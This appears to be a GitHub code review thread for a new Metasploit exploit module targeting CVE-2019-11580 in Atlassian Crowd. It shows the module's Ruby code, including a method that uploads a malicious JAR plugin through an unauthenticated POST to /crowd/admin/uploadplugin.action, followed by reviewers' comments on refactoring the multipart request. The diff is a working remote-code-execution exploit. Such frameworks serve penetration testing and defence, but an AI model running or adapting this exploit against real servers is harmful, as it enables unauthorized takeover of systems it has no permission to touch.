modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE',
+        'Description' => %q{
+          This module can be used to upload a plugin on Atlassian Cloud via
+          the pdkinstall development plugin as an unauthenticated attacker.
+          The payload is uploaded as a JAR archive containing a servlet using
+          a POST request to /crowd/admin/uploadplugin.action. The check command will
+          check that the /crowd/admin/uploadplugin.action page exists and that it
+          responds appropriately to determine if the target is vulnerable or not.
+        },
+        'Author' => [
+          'Paul', # Vulnerability discovery
+          'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter.
+          'Grant Willcox' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', '2019-11580'],
+            ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
+            ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
+            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
+          ],
+        'Platform' => %w[java],
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SAFE ]
+          },
+        'Targets' =>
+          [
+            [
+              'Java Universal',
+              {
+                'Arch' => ARCH_JAVA,
+                'Platform' => 'java'
+              }
+            ]
+          ],
+        'DisclosureDate' => '2019-05-22'
+      )
+      )
+
+    register_options(
+      [
+        Opt::RPORT(8095),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/crowd/'])
+      ]
+    )
+  end
+
+  def upload_plugin(content)
+    name = Rex::Text.rand_text_alpha(8..12)
+    boundary = rand_text_numeric(27)
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"file_cdl\"; "
+    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/octet-stream\r\n\r\n"
+    data << content
+    data << "\r\n--#{boundary}--"
+
+    send_request_raw({
+      'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
+      'method' => 'POST',
+      'data' => data,
+      'headers' =>
+        {
+          'Content-Type' => 'multipart/mixed; boundary=' + boundary
+        }
+    }, 25)
```

Comment:
Were you going to use `Rex::MIME::Message`?

Reply:
Also, `file_cdl` should be changed to `file_ tekwizz123`, at least. :-)

Reply:
Also, `file_cdl` should be changed to `file_tekwizz123`, at least. :-)

Reply:
And you can use `ctype` for `Content-Type`.

Reply:
And string interpolation is preferred over concatenation.

Reply:
Yep makes sense I took most of this from a similar module that uploads plugins to Jira so probably ways to improve it, thanks for pointing these out :)

Reply:
Also true so it does just expect `file_XXXX` as noted at https://www.corben.io/atlassian-crowd-rce/ which shows the source code so I'll randomize that. Also agree on the `ctype` part, good callout. As for `Rex::MIME::Message`, I just copied this format as a TON of other modules use it but I agree that may be a better method to approaching this.

Reply:
A ton of modules might not know better. :-)

Reply:
Further examination and shaking of the magic 8 ball shows that I'm an idiot and `Rex::MIME::Message` is actually pretty commonly used like it should be. Also as mentioned already this should be upgraded to use `Rex::MIME::Message` so long.

Reply:
It's fine. Lots of APIs are shrouded in mystery!

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15501/commits/75d19c11abdb0ec2b386174be236444f91ab2d7c